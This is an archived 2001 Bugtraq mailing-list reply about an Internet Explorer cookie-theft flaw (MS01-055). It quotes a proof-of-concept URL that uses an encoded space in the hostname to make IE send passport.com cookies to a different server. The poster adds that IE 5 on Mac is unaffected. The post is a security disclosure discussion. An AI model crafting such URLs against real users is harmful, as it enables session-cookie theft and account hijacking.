Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: the other IE cookie stealing bug (MS01-055)
From: CDE Francis <fuy () jhu edu>
Date: Fri, 16 Nov 2001 09:23:10 -0500

At 8:44 PM -0800 2001/11/14, Marc Slemko wrote:
        http://passport.com%20.sub.znep.com/cgi-bin/cookies
   ...will cause IE to connect to the hostname specified, but send the
   cookies to the server based on the hostname before the "%20"

Once again, I'd like to point out that IE 5 Mac (OS 8/9 or X) is not
 vulnerable to this attack. Please remember that IE != Windows.  :-p

-F.


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]